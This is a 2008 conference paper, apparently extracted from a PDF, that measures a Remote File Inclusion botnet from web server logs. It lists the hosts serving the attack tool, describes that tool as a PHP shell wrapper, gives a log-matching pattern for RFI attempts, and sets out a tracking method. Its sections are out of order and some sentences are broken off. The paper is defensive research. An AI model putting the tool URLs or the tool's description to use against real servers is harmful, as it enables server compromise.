Electronics, Robotics and Automotive Mechanics Conference 2008
Types of hosts on a Remote File Inclusion(RFI) botnet
Hugo F. Gonz´alez Robledo Universidad Polit´ecnica de San Luis Potos´ı
[email protected] Abstract
used in large number of sites today. Since the attacks to host or network became more difficult through the years, now a lot of the attacks were focused in those web applications and some of them were launched by botnets in an automatic way. There are a lot of works that study the botnets phenomenon like [8] [9] [6], however none of all focused in RFI attack nor the type of hosts involved in. Some ideas for this special botnet tracking where grabed from them. This paper is organized as follows: First some background is presented, on next section question work, next methods and procedures. Then results, discussion and conclusions are presented. Finally the future work.
Web server attacks are increasingly in short time for different purposes, one of the principal vectors of this attacks are RFI and even the automatic way to do this. We suppose that in a botnet involved in RFI attacks, the attackers (host that launch the attack) are web servers compromised since the natural format of the attack and the tool (remote file to include). So we go deeper identified the type of host that is the attacker through a remote analysis based on domain name, content, and dynamic ip addresses. A large botnet involved in RFI attacks was tracked by almost a year and we figure out the behavior and the kind of host are the attackers and the hosters. This track were made by one University web server logs, compared with other sources. The interesting facts founded here are related to the botnet selected to study. This botnet is formed by other kind of hosts, not web servers at all. And the tool used to compromise web server is a very general shell. Other contribution of this work is a methodology for tracking RFI botnets, that could be used in real time or for historical data.
2. Background 2.1. Remote File Inclusion There are different kinds of web attacks, in [3] four principals are quoted: 1. SQL injection. 2. Code inclusion. 3. Cross-site scripting. 4. Remote file inclusion.
1. Introduction
The Remote file inclusion, (RFI) is based on the function of some programming languages that allows to call pieces of code located in another place, including other Internet sites or directories in the same hard drive, this is a great advantage for the programmer, which neglected can result in a successful Attack Point and later compromising of the host. This Function is widely used on big web systems developments, from which vulnerabilities and attack points can be sorted out and used by the attackers. Some of the classic functionalities used in the RFI are complete access shell to the server, and the installation of one bot. The typical behavior observed for this attack looks like in Fig. 1.
First lets define some terms: attacker is the compromised host that launch an RFI attack, target is the host with the web server and the web application that receives the attack, tool is the remote file used in the attack to try to compromise the target. Hoster is the host that have a web server or a ftp server that contains the tool used by the attackers. Hit is a unique attack from unique ip. Botnet is a large number of hosts compromised and controlled to make things that benefits the owner of the botnet, such activities common include phishing, spamming, DDoS attacks and more kind of attacks. One of the principals activities on Internet is the web, so a lot of web servers with web applications are common
978-0-7695-3320-9/08 $25.00 © 2008 IEEE DOI 10.1109/CERMA.2008.60
105
whois database [1]. This is the case for this work, for example 207.112.19.152 nslookup resolves to dsl-207-112-19152.tor.primus.ca where we suppose that is a digital symmetric line (dsl) that uses dynamic ip assignment, and there is located in Canada. Since there are no attacks at the same time from those ips, we could think about the same host, but we are not 100% sure. Later we present some words that indicates dynamic ip addresses.
3. Question work For this work the question trying to get answer is: Are the attackers on a RFI botnet a compromised web servers? and there are some possible answers: • Yes, the botnet is formed by compromised web servers. • No, other kind of botnets are used to RFI attacks. • There are mixed botnets.
4. Methods and procedures We have logs since early 2007, and we look for a longest and related tools to figure and track the botnet selected, this tools are showed in table 1. Because a group of attackers ips use this tools, the name of the hosters used and the file name and by the tool by self obtained from some places, we suppose they are closely related.
Figure 1. Behavior of the bot in RFI attack
2.2. Botnets A zombie network or botnet, is made of several hosts that had been successfully attacked and compromised, this network is organized in such a way that can be remotely controlled in order to cause harm and actions that serves the purposes of the attacker [11] [10]. The way of controlling this botnets can range from an irc client, to complicated peer-to-peer systems.This information and monitoring is out of the reach of this document for not being traces in the log files of the web server. The analysis of some clients used in the botnets by php code inclusion attacks is documented in [4] and in [7] a specific analysis is made of the first automatic spread worm that affected Web applications. Among the detected functionalities of the collected perlbots are included distributed denial of service attacks, scanning of vulnerable sites, remote file inclusion attacks, sending unwanted e-mail messages (spam), that correspond to the common uses of a botnet [2].
tool first seen last seen bots attacks amygirl.3-hosting.net/cs.txt 2007-09-26 05:51:52 2007-04-01 07:59:07 33 62 amyru.h18.ru/images/cs.txt 2007-09-30 15:46:36 2008-04-07 21:20:55 536 939 amygirl.siteburg.com/images/cs.txt 2007-10-02 07:44:32 2008-03-27 19:06:40 5 14 amygirly.sky.prohosting.com/images/cs.txt 2007-10-02 08:34:15 2008-01-24 20:08:55 4 5 ninaru.hut2.ru/images/cs.txt 2007-10-04 08:54:11 2008-04-07 15:55:51 212 488 cherrygirl.h18.ru/images/cs.txt 2007-10-25 09:12:58 2008-03-30 18:20:43 63 120 Table 1. Tools selected related to a botnet
With this information, obtain the ips of the attackers, graph the data in a world map, graph the behavior and then use nslookup to get info about the host and the dynamic ip address or not, then verify if the host is on line and try to connect to a web server.
2.3. Dynamic IP addresses There are some related work on how to identify dynamic range of ip addresses, a general approach are use rDNS and
106
With the information of the web server, we presume what operating system and web server and the modules are working on it. Finally the question will be answered to this botnet.
Domain alltel.net arrownet.dk bellsouth.net btcentralplus.com casema.nl cgocable.net charter.com comcast.net conwaycorp.net cox.net dsl.bell.ca netcabo.pt numericable.fr pipex.com pldt.net power-net.net primus.ca rdsnet.ro res.rr.com rogers.com scarlet.be shawcable.net tele.dk user.ono.com verizon.net videotron.ca wideopenwest.com
5. Results 5.1. Botnet Behavior and distribution This tools reported a lot of activity for almost 100 days. The number of ips of compromised machines is 837 with a total of 1628 attacks. One important thing about this botnet is that it only attacks the index.php file with the option parameter to include the remote file, so this is very explicit attack. The botnet are distributed around the world as shown in Fig. 2, pointing out that there are a lot of bots in the east cost of USA, the blue circles are related with less than 30 hits by location, where are more blue, more hits are. The red circles are related more than 30 hits but less than 100 hits, and there is only one yellow circle with a location with more than 100 hits. The historical behavior of RFI attacks by tool is showed in Fig. 3. We can see the activity in the last 6 months, and the behavior is the same described for this type of botnets in [5], began with a first detected, then grow up a lot and finally they trend to minimize and finally disappear or almost disappear.
number of ips 6 2 7 11 7 5 27 8 6 4 256 14 16 7 12 2 7 2 6 7 9 54 11 5 116 6 12
Table 2. Attacker’s domains
5.2. The tool The tool used cs.txt is a simple wrapper to execute any command in the web server, they intent with exec, shell exec, system, passthru php commands. The command to execute should be given as parameter, in a POST command or in other way to get an effective compromise on the server. This tool is no longer available in the sites mentioned here, it was removed by the administrators of the sites we suppose.
is shawcable.net with 54 ips, but its divided in some states identified by the domain name. Next is numericable.fr from France with 16 ips and netcabo.pt from Portugal with 14 ips. There is too 1 ip from Mexico, a adsl subscriber from prodigy. We search for the port 80 on this ips, and the response were open in all targets, but when we try to connect, it didn’t response with any web page. We suppose that some of this ips are dynamic and the ISP filter response that the port is open, but really even some of this hosts are down.
5.3. Lookup the ips For now, we are almost sure that a bit amount of items are located in the east coast of USA, so the nslookups reaffirm this issue. There was a few ip’s that not respond to nslookup tool, and we discover that the majority of the bots are located in cable or adsl Internet connections. The most active domains with bots is showed in table 2. The bell.ca domain reports 256 ips with bots, maybe same host with different ip. The second domain is verizon.net with 116 ips with bots, the domain name refers specific to dsl-w.verizon.net that is the name’s identification for subscribers. The third domain
6. Discussion This is one of the largest RFI botnets tracking recently, and the origin of the attacks aren’t compromised web servers, in this case other kind of bots are used. Since botnets are used for several illicit activities, compromise web server across RFI is another one, so not all attackers are previously compromised web servers. But in some cases like this, like the hoster blocks the tool or make it unavailable, the bots needs to be updated and they aren’t.
107
Figure 2. World distribution of the botnet
Figure 3. History behavior, attacks by month by tool So the trays to compromise a new host becomes noisy and unwanted traffic on Internet.
Some kind of bots try different paths to exploit in the web server, all of them vulnerable or possible vulnerable to RFI.
108
References
This aren’t, maybe hard coded instructions in a bot running in house computers. Here we present the methodology for tracking RFI botnets:
[1] Whois.net - domain research tools. http://www.whois.net. [2] J. Aycock. Advances in Information Security, Computer Viruses and Malware. Springer, 2006. [3] H. F. Gonz´alez Robledo. Desarrollo de una herramienta para obtener el c´odigo remoto en ataques de inyecci´on de c´odigo a aplicaciones web. Actas del II Simposio sobre Seguridad Inform´atica, pages 111–116, Septiembre 2007. [4] H. F. Gonz´alez Robledo. Obteniendo el c´odigo utilizado en ataques de inyecci´on de c´odigo en web. IEEE CIINDET 2007, page 254, Octubre 2007. [5] H. F. Gonz´alez Robledo and F. C. Ordaz Salazar. Ataques de inclusi´on de archivos remotos a servidor web. IEEE CIINDET 2008, Octubre 2008. [6] M. Abu Rajab et al. A multifaceted approach to understanding the botnet phenomenon. IMC ’06, 2006. [7] N. Provos, J. McClain, K. Wang. Search worms. WORM 06, Noviembre 2006. [8] J. Nazario. Botnet tracking: Tools, techniques, and lessons learned. Blackhat, 2007. [9] P. Barford, V. Yegneswaran. An inside look at botnets. 2007. [10] The HoneynetProject. Know your enemy: Tracking botnets. http://www.honeynet.org/paper/bots/, March 2005. [11] J. Zhuge et al. Collecting autonomous spreading malware using high-interaction honeypots. ICICS 2007, LNCS 4861, pages 438–451, 2007.
• Analyze web server logs looking for pattern of attack like =[fh]t. • Extract the info about attacker, hoster, date and tool. Log in a database. • Try to get the source of the tool, keep the tool and log it. • Reverse dnslook for the attacker, log it. • Whois for the attacker, log it. • Search location in geolocation database, log it. • Group the data about hoster and attacker, tool and ips. This approach is non intrusive to a production web server, so it could be possible to concentrate all the data in a central database repository, and have a web interface to find data on it.
7. Conclusions For this RFI botnet we are sure that the bots aren’t compromised web servers for this principal reasons: 1. The attacks were focused on a single file index.php used same file in the tool cs.txt but with no arguments, like hard coded piece of code. 2. Even the tool weren’t available, the bots try to use it. Last month any of the tools weren’t on line any more. 3. The host with the bots aren’t on line, almost all of them have dynamic ips and not available all the time. So the answer for the work question is number two: No, other kind of botnets are used to RFI attacks. But it’s only for this botnet, with the methodology we will tracking more botnets.
8. Future work We are working on improve the methodology used for this botnet tracking and tray to automatize this for better results, making the analysis and queries when the attack occur and not off-line like in this case. At the same time we are working on make similar analysis on other RFI botnets, first detect it and then make the work. And finally we are working on a web system for the database, to permit anybody consult and query about the behavior and tendencies of the RFI botnets.
109
